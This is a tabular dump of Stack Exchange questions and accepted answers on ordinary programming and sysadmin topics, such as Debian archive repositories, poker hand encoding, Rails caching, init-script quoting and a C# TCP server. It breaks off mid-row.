id | question | title | tags | accepted_answer
---|---|---|---|---
_unix.66830 | Debian Lenny, the current oldstable, ceased receiving security updates early in February, and now seems to no longer be hosted at the usual FTP mirrors (see, e.g., curl http://ftp.nl.debian.org/debian/dists/lenny/ | less). Are there any surviving FTP repositories of Lenny that can be used via APT? | Are there any source APT repositories for Debian Lenny? | debian | As answered at serverfault.com or more verbose at superuser.com,you need to use now archive.debian.org:deb http://archive.debian.org/debian/ lenny contrib main non-freedeb http://archive.debian.org/debian-security lenny/updates mainTo get the GPG key: apt-get install debian-archive-keyring |
_webmaster.2042 | I'm looking into implementing the Facebook like-button on my site. Therefore, I'm looking for some good examples of the use of the like-button. I'm looking at the placement of the like-button and the use of the Open Graph meta-properties. Please explain why you like a particular implementation. | What is the best implementation of the Facebook like-button you've seen? | facebook | null |
_cs.72542 | A deck of cards is 52. A hand is 5 cards from the 52 (cannot have a duplicate). What is the least amount of bits to represent a 5 card hand and how?A hand is NOT order dependent (KQ = QK). 64329 = 96432Yes, can use 52 bits. That can represent a hand of any number of cards. Given a hand is exactly 5 cards is there a way to represent it with less than 52 bits. A single card can be represented with 6 bits = 64. So could just use 6 bits * 5 cards = 30 bits. But that would be order dependent. I could just sort and this should work. If that would not work please let me know. Is there a way to get the key to 32 bits or under and not have to sort the 5 card tuple. This is for poker simulations and sorting would be a lot of overhead compared to just generating the hand. If I have a dictionary with the relative value of each hand it is two simple lookups and a comparison to compare the value of two hands. If I have to sort the hands first that is large compared to two lookups and a comparison. In a simulation will compare millions. I will not get sorted hands from the simulation. The sort is not simple like 52 51 50 49 48 before 52 51 50 49 47. You can have straight flush quads ....There are 2598960 possible 5 card hands. That is the number of rows. The key is the 5 cards. I would like to get a key that is 32 bits or under where the the cards do not need to be sorted first. Cannot just order the list as many hands tie. Suit are spade, club, diamond, and heart. 7c 8c 2d 3d 4s = 7s 8s 2c 3c 4h. There is a large number of ties.The next step is 64 bits and will take the hit of the sort rather than double the size of the key. I tested and SortedSet<int> quickSort = new SortedSet<int>() { i, j, k, m, n }; doubles the time of the operation but I still may do it.It gets more complex. I need to be able to represent a boat as twos over fives (22255). So sorting them breaks that. I know you are going to say but that is fast. 
Yes it is fast and trivial but I need as fast as possible.C# for the accepted answer: private int[] DeckXOR = new int[] {0x00000001,0x00000002,0x00000004,0x00000008,0x00000010,0x00000020,0x00000040, 0x00000080,0x00000100,0x00000200,0x00000400,0x00000800,0x00001000,0x00002000, 0x00004000,0x00008000,0x00010000,0x00020000,0x00040000,0x00080000,0x00100000, 0x00200000,0x00400000,0x00800000,0x01000000,0x02000000,0x04000000,0x07fe0000, 0x07c1f000,0x0639cc00,0x01b5aa00,0x056b5600,0x04ed6900,0x039ad500,0x0717c280, 0x049b9240,0x00dd0cc0,0x06c823c0,0x07a3ef20,0x002a72e0,0x01191f10,0x02c55870, 0x007bbe88,0x05f1b668,0x07a23418,0x0569d998,0x032ade38,0x03cde534,0x060c076a, 0x04878b06,0x069b3c05,0x054089a3};public void PokerProB(){ Stopwatch sw = new Stopwatch(); sw.Start(); HashSet<int> cardsXOR = new HashSet<int>(); int cardXOR; int counter = 0; for (int i = 51; i >= 4; i--) { for (int j = i - 1; j >= 3; j--) { for (int k = j - 1; k >= 2; k--) { for (int m = k - 1; m >= 1; m--) { for (int n = m - 1; n >= 0; n--) { counter++; cardXOR = DeckXOR[i] ^ DeckXOR[j] ^ DeckXOR[k] ^ DeckXOR[m] ^ DeckXOR[n]; if (!cardsXOR.Add(cardXOR)) Debug.WriteLine(problem); } } } } } sw.Stop(); Debug.WriteLine(Count {0} millisec {1} , counter.ToString(N0), sw.ElapsedMilliseconds.ToString(N0)); Debug.WriteLine();} | Represent a 5 card poker hand | combinatorics | Let $C$ be a $[52,25,11]$ code. The parity check matrix of $C$ is a $27 \times 52$ bit matrix such that the minimal number of columns whose XOR vanishes is $11$. Denote the $52$ columns by $A_1,\ldots,A_{52}$. We can identify each $A_i$ as a binary number of length $27$ bits. The promise is that the XOR of any $1$ to $10$ of these numbers is never $0$. Using this, you can encode your hand $a,b,c,d,e$ as $A_a \oplus A_b \oplus A_c \oplus A_d \oplus A_e$, where $\oplus$ is XOR. 
Indeed, clearly this doesn't depend on the order, and if two hands $H_1,H_2$ collide, then XORing the two hash values gives $10-2|H_1 \cap H_2|\leq 10$ numbers whose XOR is zero.Bob Jenkins describes such a code in his site, and from that we can extract the array0x00000001,0x00000002,0x00000004,0x00000008,0x00000010,0x00000020,0x00000040,0x00000080,0x00000100,0x00000200,0x00000400,0x00000800,0x00001000,0x00002000,0x00004000,0x00008000,0x00010000,0x00020000,0x00040000,0x00080000,0x00100000,0x00200000,0x00400000,0x00800000,0x01000000,0x02000000,0x04000000,0x07fe0000,0x07c1f000,0x0639cc00,0x01b5aa00,0x056b5600,0x04ed6900,0x039ad500,0x0717c280,0x049b9240,0x00dd0cc0,0x06c823c0,0x07a3ef20,0x002a72e0,0x01191f10,0x02c55870,0x007bbe88,0x05f1b668,0x07a23418,0x0569d998,0x032ade38,0x03cde534,0x060c076a,0x04878b06,0x069b3c05,0x054089a3Since the first 27 vectors are just the 27 numbers of Hamming weight 1, in order to check that this construction is correct it suffices to consider all $2^{52-27}-1 = 2^{25}-1$ possible non-trivial combinations of the last 25 numbers, checking that their XORs always have Hamming weight at least 10. For example, the very first number 0x07fe0000 has Hamming weight exactly 10. |
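The construction is easy to sanity-check. A Python sketch using the array quoted in the answer: the key is the XOR of the five cards' code words, so it is order-independent by construction, and the code's minimum-distance property rules out collisions between distinct hands (checked here over all C(22,5) = 26334 hands drawn from the last 22 cards, whose code words are the dense ones).

```python
from functools import reduce
from itertools import combinations

# The 52 code words quoted in the answer (columns of a [52,25,11] code).
DECK_XOR = [
    0x00000001, 0x00000002, 0x00000004, 0x00000008, 0x00000010, 0x00000020,
    0x00000040, 0x00000080, 0x00000100, 0x00000200, 0x00000400, 0x00000800,
    0x00001000, 0x00002000, 0x00004000, 0x00008000, 0x00010000, 0x00020000,
    0x00040000, 0x00080000, 0x00100000, 0x00200000, 0x00400000, 0x00800000,
    0x01000000, 0x02000000, 0x04000000, 0x07fe0000, 0x07c1f000, 0x0639cc00,
    0x01b5aa00, 0x056b5600, 0x04ed6900, 0x039ad500, 0x0717c280, 0x049b9240,
    0x00dd0cc0, 0x06c823c0, 0x07a3ef20, 0x002a72e0, 0x01191f10, 0x02c55870,
    0x007bbe88, 0x05f1b668, 0x07a23418, 0x0569d998, 0x032ade38, 0x03cde534,
    0x060c076a, 0x04878b06, 0x069b3c05, 0x054089a3,
]

def hand_key(cards):
    """27-bit, order-independent key for a hand (cards are indices 0..51)."""
    return reduce(lambda acc, c: acc ^ DECK_XOR[c], cards, 0)

# Order independence: any permutation of the same hand gives the same key.
assert hand_key([0, 13, 26, 39, 51]) == hand_key([51, 26, 0, 39, 13])

# No collisions among all C(22,5) hands drawn from cards 30..51.
hands = list(combinations(range(30, 52), 5))
assert len({hand_key(h) for h in hands}) == len(hands)
```

No sorting is needed before hashing, which is exactly the property the asker wanted.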
_reverseengineering.9126 | I've been trying to google any information about how I can create a viewer for some custom file formats. In my case, I've extracted multiple .tbl files from game sources. Each file contains a database table. From what I was able to google, I was able to extract the file header. I have tried some tbl-viewers but they say the file is corrupted, so I assume some custom encryption is present here. First bytes of file 1:
00000000  46 54 41 42 4c 45 00 00 00 00 10 00 21 00 00 00
00000010  03 00 00 00 2c 00 00 00 b0 00 00 00 b4 00 00 00
00000020  10 00 00 00 c4 02 00 00 00 00 00 00 01 00 00 00
00000030  02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00
First bytes of file 2:
00000000  46 54 41 42 4c 45 00 00 00 00 10 00 22 00 00 00
00000010  15 00 00 00 2c 00 00 00 b4 00 00 00 ca 00 00 00
00000020  58 00 00 00 7a 0c 00 00 00 00 00 00 01 00 00 00
00000030  02 00 00 00 03 00 00 00 04 00 00 00 06 00 00 00
So in this case the first 12 bytes seem to be the file header 46 54 41 42 4c 45 00 00 00 00 10 00, which stands for FTABLE...... And this is where I am stuck. I didn't find information on what to do next to achieve my goal. | File reverse engineering - .tbl format | file format;encryption | null |
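A standard first step with an unknown binary format like this is to parse the fixed header into integers and diff the fields across files. A Python sketch over the first dump above: the magic check is solid, but the little-endian uint32 layout and any meaning assigned to the fields are guesses from comparing the two files, not documented facts about the format.

```python
import struct

# First 48 bytes of "file 1" as dumped in the question.
FILE1_HEADER = bytes.fromhex(
    "46 54 41 42 4c 45 00 00 00 00 10 00 21 00 00 00"
    "03 00 00 00 2c 00 00 00 b0 00 00 00 b4 00 00 00"
    "10 00 00 00 c4 02 00 00 00 00 00 00 01 00 00 00"
)

def parse_ftable_header(data):
    """Split the apparent FTABLE header into little-endian integers.

    Only the 6-byte magic is certain; the six uint32 values after byte 12
    are a guess (they look like counts/offsets, since they differ slightly
    between the two files in the question).
    """
    if data[:6] != b"FTABLE":
        raise ValueError("not an FTABLE file")
    return struct.unpack_from("<6I", data, 12)
```

Diffing `parse_ftable_header` output for both files against their sizes and record counts is usually how such fields get identified; "corrupted" verdicts from generic viewers often just mean a different, undocumented layout rather than encryption.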
_softwareengineering.333435 | TL;DROur app has a Django backend and an Angular 2 frontend; we package it up in Docker. Our client wishes to run this app on their HPC hardware. In return, they pay us a monthly 'subscription'.How can we make sure that the client cannot cancel the contract with us but continue to use the software?More detailWe have made this app that manages simulations and the data from simulations that use an HPC resource. We intend to make this a cloud-based thing but we have a client who wants to use their own hardware.We have a good relationship with them and value their feedback, so we're happy with this arrangement.Our concern is if we try to enter similar agreements with other clients we don't know in the future. We'd probably want to let them trial the software first, but how do we prevent them from running off with it afterwards?We have a Django backend and an Angular 2 frontend. I don't know if that makes a big difference.I understand we can obfuscate the code somewhat. Though, there will always be a way back to the original code. Our bigger concern is that someone can stop paying the bills but continue to use our software.Is there some way we can license the app? I wonder if there is a way to make the code only work if a valid key is provided. These keys would become invalid over time. We would be the only ones who could generate these keys.Oh. And this client's HPC doesn't connect to the internet. So no cloud-based authorisation is going to work, I don't think.Any ideas? | How to control use software hosted on client's computer | licensing;client relations | null |
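The key-based idea in the question can work fully offline: ship a license file whose payload (client id, expiry) is signed by the vendor, and have the app refuse to run once the signature fails or the expiry passes. The sketch below uses an HMAC for brevity; a real product should use asymmetric signatures (for example Ed25519 via the `cryptography` package) so the verification key embedded in the app cannot be used to mint new licenses. All names and the token format here are illustrative, not an established scheme.

```python
import base64
import hashlib
import hmac
import json
import time

SECRET = b"vendor-only-secret"  # illustrative; use an asymmetric key pair in practice

def issue_license(client, valid_until):
    """Create a token: base64(claims) + "." + base64(HMAC(claims))."""
    claims = base64.urlsafe_b64encode(
        json.dumps({"client": client, "valid_until": valid_until}).encode())
    sig = base64.urlsafe_b64encode(
        hmac.new(SECRET, claims, hashlib.sha256).digest())
    return (claims + b"." + sig).decode()

def license_valid(token, now=None):
    """Check signature and expiry; needs no network access."""
    claims_b64, sig_b64 = token.encode().split(b".")
    expected = base64.urlsafe_b64encode(
        hmac.new(SECRET, claims_b64, hashlib.sha256).digest())
    if not hmac.compare_digest(sig_b64, expected):
        return False  # tampered or forged
    claims = json.loads(base64.urlsafe_b64decode(claims_b64))
    return (now if now is not None else time.time()) < claims["valid_until"]
```

This stops the casual "keep running after cancelling" case; a determined client with full access to the binary can always patch the check out, which is why such schemes are usually paired with contracts rather than relied on alone.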
_codereview.123950 | private void loadTabsIfGPSAndInternetAvailable() { final Utils utils = new Utils(this); final LocationClient locationClient = new LocationClient(this); if (!utils.isConnected()) { utils.generateNoConnectivityAlert(); } else if (!locationClient.hasGPS()) { utils.generateNoGPSAlert(); } else { if (androidVersion >= Build.VERSION_CODES.M) { requestAllPermissions(); } else { loadCameraAndForecastTabs(); } } // ends else block for if internet and GPS are enabled }This is some code that loads tabs if the GPS and internet connectivity are available. I'm aware that at the moment this is very messy code, with lots of nested if statements, that is hard to read, and am not sure how to structure it better. Can people help me please? | Asking for GPS and Internet permissions | java;android | null |
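The question never got an accepted answer, but the usual cure for this shape is well known: guard clauses. Test each failure condition up front and return early, so the happy path reads flat, top to bottom. A language-neutral sketch of the same control flow in Python (the callables stand in for the question's Android methods; names are adapted, not from any real API):

```python
MARSHMALLOW = 23  # Build.VERSION_CODES.M

def load_tabs_if_ready(is_connected, has_gps, android_version,
                       no_connectivity_alert, no_gps_alert,
                       request_all_permissions, load_tabs):
    """Flat, early-return version of the question's nested-if logic."""
    if not is_connected:
        no_connectivity_alert()
        return
    if not has_gps:
        no_gps_alert()
        return
    if android_version >= MARSHMALLOW:
        request_all_permissions()
    else:
        load_tabs()
```

Each precondition now has exactly one line of handling next to it, and the trailing "ends else block" comment becomes unnecessary because there is nothing left to match up.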
_unix.283531 | A have a brand new 16GB class 10 SD card and produce a very strange behavior.After I attached the the card with an USB SD-Card reader, the device appeared as /dev/sdb. I tried to copy a 2GB raw image with dd into, but it's immediately returns: No more space left on device.The block device shows: there is only 10M space on it.ls -lah /dev/sdb-rw-r--r-- 1 root root 10M mj 16 23:16 /dev/sdbfdisk shows the same size:fdisk -l /dev/sdbDisk /dev/sdb: 10 MiB, 10485760 bytes, 20480 sectorsUnits: sectors of 1 * 512 = 512 bytesSector size (logical/physical): 512 bytes / 512 bytesI/O size (minimum/optimal): 512 bytes / 512 bytesDisklabel type: dosDisk identifier: 0x84f9d19fI've tried the SD-card with another reader, but looks like it's not a card reader issue, the size of the SD card is 10M with every single reader.cat /proc/partitionsmajor minor #blocks name... 8 16 15558144 sdb...The interesting part is: the kernel looks like actually knows the right size of SD card.cat /sys/block/sdb/size31116288 # numbers of 512 byte blocks => 15.93 GBAnd seems like it's properly recognized.May 16 22:58:07 DDSI-Laptop kernel: [258762.883672] usb 1-3: New USB device found, idVendor=14cd, idProduct=125cMay 16 22:58:07 DDSI-Laptop kernel: [258762.883674] usb 1-3: New USB device strings: Mfr=1, Product=3, SerialNumber=2May 16 22:58:07 DDSI-Laptop kernel: [258762.883675] usb 1-3: Product: Mass Storage DeviceMay 16 22:58:07 DDSI-Laptop kernel: [258762.883676] usb 1-3: Manufacturer: GenericMay 16 22:58:07 DDSI-Laptop kernel: [258762.883677] usb 1-3: SerialNumber: 125C20100726May 16 22:58:07 DDSI-Laptop kernel: [258762.883972] usb-storage 1-3:1.0: USB Mass Storage device detectedMay 16 22:58:07 DDSI-Laptop kernel: [258762.884114] scsi host52: usb-storage 1-3:1.0May 16 22:58:07 DDSI-Laptop mtp-probe: checking bus 1, device 30: /sys/devices/pci0000:00/0000:00:14.0/usb1/1-3May 16 22:58:07 DDSI-Laptop mtp-probe: bus: 1, device: 30 was not an MTP deviceMay 16 22:58:08 DDSI-Laptop kernel: 
[258763.881813] scsi 52:0:0:0: Direct-Access Mass Storage Device PQ: 0 ANSI: 0 CCSMay 16 22:58:08 DDSI-Laptop kernel: [258763.882008] sd 52:0:0:0: Attached scsi generic sg1 type 0May 16 22:58:08 DDSI-Laptop kernel: [258763.883073] sd 52:0:0:0: [sdb] 31116288 512-byte logical blocks: (15.9 GB/14.8 GiB)May 16 22:58:08 DDSI-Laptop kernel: [258763.883195] sd 52:0:0:0: [sdb] Write Protect is offMay 16 22:58:08 DDSI-Laptop kernel: [258763.883198] sd 52:0:0:0: [sdb] Mode Sense: 03 00 00 00May 16 22:58:08 DDSI-Laptop kernel: [258763.883312] sd 52:0:0:0: [sdb] No Caching mode page foundMay 16 22:58:08 DDSI-Laptop kernel: [258763.883315] sd 52:0:0:0: [sdb] Assuming drive cache: write throughWhat cause the difference? | linux: Class10 SD card different device and block device size | linux;debian;block device;sd card;partition table | - /dev/sdbThis is a regular file, not a device. You must have tried to write to /dev/sdb at some point when there was no device connected with this drive letter. Be careful! You were lucky not to overwrite a different device from the one you intended.Information about block devices in /proc and /sys is provided directly by the kernel uses the kernel's name for the device. Device nodes in /dev are managed by udev; they normally follow the kernel's device names (and add other names as symbolic links) but writing to /dev manually can disrupt udev. Since the directory entry /dev/sdb already existed, it didn't create the device node when you plugged in the SD card.Remove /dev/sdb, eject the SD card, plug it back in, and check what device name it gets. You should see a block device:$ ls -l /dev/sdbbrw-rw-rw- 1 root disk 8, 16 /dev/sdb |
_codereview.61080 | I have a Rails 3.2.14 app where I have a home controller (dashboard). In this controller and view I'm calling multiple instance variables to get different counts based off of scopes I've created in the Call and Unit model. I'd like to see if anyone has any suggestions on how I can DRY this up and query less so the controller/view loads faster. This code is very old and I'm looking for the best way to refactor it.home_controller.rb def index @calls = Call.open_status @all = Call.all @unit = Unit.active.order(unit_name) @avail = Unit.active.in_service @unavail = Unit.active.out_of_service @unassigned = Call.unassigned_calls @today = Call.today @year = Call.year @previous = Call.previous_year @assigned = Call.assigned_calls.until_end_of_day @unassigned = Call.unassigned_calls.until_end_of_day @scheduled = Call.scheduled_calls endendcall.rb model scope :open_status, where(call_status: open) scope :cancel, where(call_status: cancel) scope :closed, where(call_status: close) scope :waitreturn, where(wait_return: yes) scope :wc, lambda { where(service_level_id: ServiceLevel.find_by_level_of_service(WC).id) } scope :bls, lambda { where(service_level_id: ServiceLevel.find_by_level_of_service(BLS).id) } scope :als, lambda { where(service_level_id: ServiceLevel.find_by_level_of_service(ALS).id) } scope :micu, lambda { where(service_level_id: ServiceLevel.find_by_level_of_service(MICU).id) } scope :cct, lambda { where(service_level_id: ServiceLevel.find_by_level_of_service(CCT).id) } scope :assist, lambda { where(service_level_id: ServiceLevel.find_by_level_of_service(ASSIST).id) } scope :em, lambda { where(service_level_id: ServiceLevel.find_by_level_of_service(EM).id) } scope :by_service_level, lambda { |service_level| where(service_level_id: ServiceLevel.find_by_level_of_service(service_level).id) } scope :by_region, lambda { |region| where(region_id: Region.find_by_area(region).id) } scope :from_facility, lambda { |id| where(transfer_from_id: id) } scope 
:to_facility, lambda { |id| where(transfer_to_id: id) } scope :search_between, lambda { |start_date, end_date| where(transfer_date BETWEEN ? AND ?, start_date.beginning_of_day, end_date.end_of_day)} scope :search_by_start_date, lambda { |start_date| where('transfer_date BETWEEN ? AND ?', start_date.beginning_of_day, start_date.end_of_day) } scope :search_by_end_date, lambda { |end_date| where('transfer_date BETWEEN ? AND ?', end_date.beginning_of_day, end_date.end_of_day) } scope :open_calls, lambda { open_status.includes(:call_units).where([call_units.unit_id IS NOT NULL]) } scope :unassigned_calls, lambda { open_status.includes(:call_units).where([call_units.unit_id IS NULL]).order(transfer_date ASC) } scope :assigned_calls, lambda { open_status.includes(:call_units).where([call_units.unit_id IS NOT NULL]).order(transfer_date ASC) } scope :by_unit_name, lambda {|unit_name| joins(:units).where('units.unit_name = ?', unit_name)} scope :ambulance, lambda {joins(:units).where('units.vehicle_type = ?', Ambulance)} scope :wheelchair, lambda {joins(:units).where('units.vehicle_type = ?', Wheelchair)} scope :scheduled_calls, lambda { open_status.includes(:call_units).where([calls.transfer_date > ?, Time.zone.now.end_of_day]).order(transfer_date ASC) } scope :medic_calls, lambda { where([call_status = ? and call_units.unit_id IS NOT NULL, open]).order(id ASC) } scope :today, lambda { where(transfer_date BETWEEN ? AND ?, Time.zone.now.beginning_of_day, Time.zone.now.end_of_day) } scope :yesterday, lambda { where(transfer_date BETWEEN ? AND ?, 1.day.ago.beginning_of_day, 1.day.ago.end_of_day) } scope :year, lambda { where(transfer_date BETWEEN ? AND ?, Time.zone.now.beginning_of_year, Time.zone.now.end_of_year) } scope :previous_year, lambda {where(transfer_date BETWEEN ? 
AND ?, 1.year.ago.beginning_of_year, 1.year.ago.end_of_year)} scope :until_end_of_day, lambda { where(transfer_date < ?, Time.zone.now.end_of_day) }unit.rb model scope :in_service, lambda { where(status_id: Status.where(unit_status: [In Service, At Post, At Station]).map(&:id))} scope :out_of_service, lambda { where(status_id: Status.find_by_unit_status(Out of Service).id)} scope :active, where(unit_status: Active)home/index.html.erb<div class=main-area dashboard> <div class=container> <div class=row> <div class=span12> <div class=slate clearfix> <a class=stat-column href=#> <span class=number><%= @today.count %></span> <span>Today's Calls</span> <span class=number><%= @year.count %></span> <span>Current YTD Calls</span> <span class=number><%= @previous.count %></span> <span>Previous YTD Calls</span> <span class=number><%= @all.count %></span> <span>Calls To Date</span> </a> <a class=stat-column href=#> <span class=number><%= @calls.count %></span> <span>Open Calls</span> <span class=number><%= @assigned.count %></span> <span>Active Calls</span> <span class=number><%= @scheduled.count %></span> <span>Scheduled Calls</span> <span class=number><%= @unassigned.count %></span> <span>Unassigned Calls</span> </a> <a class=stat-column href=#> <span class=number><%= @today.ambulance.count %></span> <span>Ambulance Calls</span> <span class=number><%= @today.wheelchair.count %></span> <span>Wheelchair Calls</span> <span class=number><%= @avail.count %></span> <span>Units In Service</span> <span class=number><%= @unavail.count %></span> <span>Units Out of Service</span> </a> <a class=stat-column href=#> <span class=number><%= @today.bls.count %></span> <span>BLS Calls</span> <span class=number><%= @today.als.count %></span> <span>ALS Calls</span> <span class=number><%= @today.cct.count %></span> <span>CCT Calls</span> <span class=number><%= @today.micu.count %></span> <span>MICU Calls</span> </a> </div> </div> </div> <div class=row> <div class=span6> <div class=slate> <div 
class=page-header> <h2><i class=icon-signal pull-right></i>Medics</h2> </div> <table class=table table-striped table-bordered> <thead> <tr> <th>Unit</th> <th>Attendant</th> <th>InCharge</th> </tr> </thead> <tbody> <tr> <% @unit.each do |unit| %> <td><%= unit.try(:unit_name) %></td> <td><%= unit.attendant.try(:medic_name) %></td> <td><%= unit.incharge.try(:medic_name) %></td> </tr> <% end %> </tbody> </table> </div> </div> <div class=span6> <div class=slate> <div class=page-header> <h2><i class=icon-shopping-cart pull-right></i>Units</h2> </div> <table class=table table-striped table-bordered> <thead> <tr> <th>Unit</th> <th>Status</th> </tr> </thead> <tbody> <tr> <% @unit.each do |unit| %> <td><%= unit.try(:unit_name) %></td> <td><div class=<%= set_status(unit.status) %>><%= unit.status.try(:unit_status) %></div></td> </tr> <% end %> </tbody> </table> </div> </div> </div> </div> </div> | Controller and view to call multiple instance variables | ruby;html;ruby on rails;active record;erb | Wow... yeah, that's a lot.My immediate suggestion would be to simply make the dashboard do less. I doubt all of those things are of extreme importance all the time.A lot seems like historical data (that spans years), but it's shown along side current stuff (that spans hours, it seems). I imagine most users only use a fraction of all that (and some users are no doubt intimidated). No offense intended, but I imagine the UI is simply overwhelming users - until they learn to ignore almost all of it, and just focus on the things they actually need.If it must be on one page, load the less-important data on-demand via ajax.Second suggestion: Aggressively cache as much as you can. Cache, cache, cache. For instance, any YTD-value will by definition only change once per day, not for each request. Check out the Rails Guides for some ideas and ActiveSupport::Cache for the implementation, and/or look into things like redis and memcached.Rails has a lot built-in already, though. 
For instance, you could cache something like the last year's number of calls like so:class Call def self.previous_year_cached expiry = Time.zone.now.end_of_year - Time.zone.now Rails.cache.fetch([self.name, previous_year_count], expires_in: expiry) do self.previous_year.count end endendSo now, when you call Call.previous_year_cached it'll either give you a cached value without hitting the database, or it'll execute the block to find and store a new value. And it'll set the cache to expire on New Year's Eve (you could of course also just set to expire after 1.week or something, and skip the calculation, but it's just a little arithmetic).Second line of caching is view caching. The Rails Guides I linked to above provide a good introduction to those. View caching will often give you even more of a speed-up, since rendering views is time-consuming. So view caching will give you the most bang for your buck, because you're caching at the very last step before sending the page to the browser. But any kind of caching will help speed things up, so data caching like above will also help. That way, even if a view has to be re-rendered, it might still avoid hitting the database by pulling its values from the cache.You can also cache things without an explicit expiration date, and instead just flush (remove) the cache when it needs to update. For instance, you could cache today's calls, and flush the cached count when a new call record is added:class Call after_create :flush_cache after_destroy :flush_cache def self.today_count_cached Rails.cache.fetch([self.name, today_count]) { self.today.count } end private def flush_cache Rails.cache.delete([self.class.name, today_count]) endendYou can of course add many more cached values this way, choosing when to store and delete them. See ActiveRecord's callbacks for the triggers you can act on.Third option would be to do more client-side. 
Let users sort and filter instead of trying to anticipate every single data breakdown a user could want. Again, I doubt your users actually want all that data . They may think they do, but do they really? It's easy to say yes if we pretend there are no tradeoffs, but there are: usability and speed (and maintainability, and development time).Try checking out ux.stackexchange.com. Besides perhaps finding some good tips for organizing a lot of data, you'll no doubt also find studies that indicate exactly how much information a human being can actually process. It's always useful to have scientific studies to refer to, if you want to argue for a more simple design.I know it's trite, but less is more. Really.I know this isn't much of a code review, but the individual pieces look OK on their own. There are just too many pieces, if you ask me. The only thing that looks iffy (after a quick glance) are all the service level scopes. If you just make a scope for every conceivable service level, you might as well just have 1 scope with a lambda, and pass in the service level (or use service_level.calls). What you have right now is overly specific, and couples everything very tightly. |
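The `Rails.cache.fetch` pattern the answer leans on is framework-agnostic: look up a key, and on a miss run a block and store its result with an expiry. A minimal in-process Python sketch of that contract (Rails adds pluggable backends such as memcached and redis on top of the same interface):

```python
import time

class TTLCache:
    """fetch-or-compute with per-key expiry, modeled on Rails.cache.fetch."""

    def __init__(self, clock=time.time):
        self._store = {}   # key -> (value, expires_at)
        self._clock = clock

    def fetch(self, key, expires_in, compute):
        hit = self._store.get(key)
        now = self._clock()
        if hit is not None and hit[1] > now:
            return hit[0]          # fresh cached value: no recompute
        value = compute()          # miss or stale: run the expensive block
        self._store[key] = (value, now + expires_in)
        return value

    def delete(self, key):
        """Flush one key, as the after_create/after_destroy callbacks do."""
        self._store.pop(key, None)
```

The dashboard's YTD counters map onto `fetch` with a long `expires_in`, while today's-call counters map onto `fetch` plus `delete` from a model callback, exactly as in the Ruby examples above.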
_softwareengineering.142289 | How are authors able to write a book on a framework that has just been released? A framework like Spring is updated, and a book is released the next day. Is this typically done by people who are direct contributors? Are they basing it off of beta/alpha versions? I find this rather difficult to understand, as documentation is rarely up to snuff by the time the framework is updated. | How does one write a book on a new framework? | books;technical writing | Those who write books about frameworks are generally involved in the framework they are writing about; they have access to documentation and pre-release versions of the framework. They aren't random people who know about programming: they likely contacted the development team about writing a book and got the information, or were asked by the development team to write a book. Also, good frameworks keep their documentation up to date (it's part of being a good framework), though the general public may not have access to the most up-to-date documentation. |
_webapps.86739 | I want to gather information and pictures from 100 college alumni. How can I do this in a way where I can send individual links to each alumni member? | How do I send individual links to collect data in Cognito Forms | cognito forms | null |
_unix.218797 | Hello, I am a newbie in bash and I am coding a daemon to execute a service. The syntax is ./ctlscript.sh start. When I execute service openproject start it should run this command, but it runs ./ctlscript.sh without a parameter and I get the usage. This is my script:#! /bin/sh### BEGIN INIT INFO# Provides: openproject# Required-Start: $remote_fs $syslog# Required-Stop: $remote_fs $syslog# Default-Start: 2 3 4 5# Default-Stop: 0 1 6# Short-Description: Openproject# Description: This file starts and stops Openproject server#### END INIT INFOOPENP_DIR=/opt/openprjcase $1 in start) su administrador -c $OPENP_DIR/ctlscript.sh start ;; stop) su administrador -c $OPENP_DIR/ctlscript.sh stop ;; restart) su administrador -c $OPENP_DIR/ctlscript.sh stop sleep 20 su administrador -c $OPENP_DIR/ctlscript.sh start ;; *) echo "Usage: openproject {start|stop|restart}" >&2 exit 3 ;;esacThis is what I get when I run service openproject stop. It is the same when I launch ./ctlscript.sh (without any parameter):usage: /opt/openprj/ctlscript.sh help /opt/openprj/ctlscript.sh (start|stop|restart|status) /opt/openprj/ctlscript.sh (start|stop|restart|status) mysql /opt/openprj/ctlscript.sh (start|stop|restart|status) memcached /opt/openprj/ctlscript.sh (start|stop|restart|status) apache /opt/openprj/ctlscript.sh (start|stop|restart|status) subversion /opt/openprj/ctlscript.sh (start|stop|restart|status) openprojecthelp - this screenstart - start the service(s)stop - stop the service(s)restart - restart or start the service(s)status - show the status of the service(s)Thanks in advance. | Execute sh with parameters in bash | bash;shell;daemon | The argument to -c must be a single word, so quote it: su administrador -c "$OPENP_DIR/ctlscript.sh start". For restart, you should stop first, then start. |
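Why the quoting matters: without quotes, `start` is split off as a separate word and never becomes part of the `-c` command, so ctlscript.sh runs with no argument and prints its usage. The shell's word splitting can be illustrated with Python's `shlex`, which follows the same quoting rules (note it does not expand `$OPENP_DIR`, which is fine for showing the split):

```python
import shlex

# Unquoted: -c receives only the script path; "start" becomes a separate argument.
unquoted = shlex.split('su administrador -c $OPENP_DIR/ctlscript.sh start')
assert unquoted == ['su', 'administrador', '-c', '$OPENP_DIR/ctlscript.sh', 'start']

# Quoted: the whole command line travels as one word to -c.
quoted = shlex.split('su administrador -c "$OPENP_DIR/ctlscript.sh start"')
assert quoted == ['su', 'administrador', '-c', '$OPENP_DIR/ctlscript.sh start']
```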
_codereview.72017 | I am working on a banking application. I want to create a multithreaded TCP Payment Card (iso8583) server that can handle passbook printing requests simultaneously. Multiple devices are connected to the server from different locations.I am going to use below code in my application. Is this thread safe? Can I face any problem in the future if I use this code? All suggestions welcome.class Program { static void Main(string[] args) { TcpListener serverSocket = new TcpListener(8888); TcpClient clientSocket = default(TcpClient); int counter = 0; serverSocket.Start(); Console.WriteLine( >> + Server Started); counter = 0; while (true) { counter += 1; clientSocket = serverSocket.AcceptTcpClient(); Console.WriteLine( >> + Client No: + Convert.ToString(counter) + started!); handleClinet client = new handleClinet(); client.startClient(clientSocket, Convert.ToString(counter)); } clientSocket.Close(); serverSocket.Stop(); // Console.WriteLine( >> + exit); Console.ReadLine(); } } //Class to handle each client request separatly public class handleClinet { TcpClient clientSocket; string clNo; public void startClient(TcpClient inClientSocket, string clineNo) { this.clientSocket = inClientSocket; this.clNo = clineNo; Thread ctThread = new Thread(doChat); ctThread.Start(); } private void doChat() { int requestCount = 0; byte[] bytesFrom = new byte[10025]; string dataFromClient = null; Byte[] sendBytes = null; string serverResponse = null; string rCount = null; requestCount = 0; while ((true)) { try { var respose = ; requestCount = requestCount + 1; NetworkStream networkStream = clientSocket.GetStream(); networkStream.Read(bytesFrom, 0, (int)clientSocket.ReceiveBufferSize); dataFromClient = System.Text.Encoding.ASCII.GetString(bytesFrom); // dataFromClient = dataFromClient.Substring(0, dataFromClient.IndexOf($)); Console.WriteLine( >> + From client- + clNo + 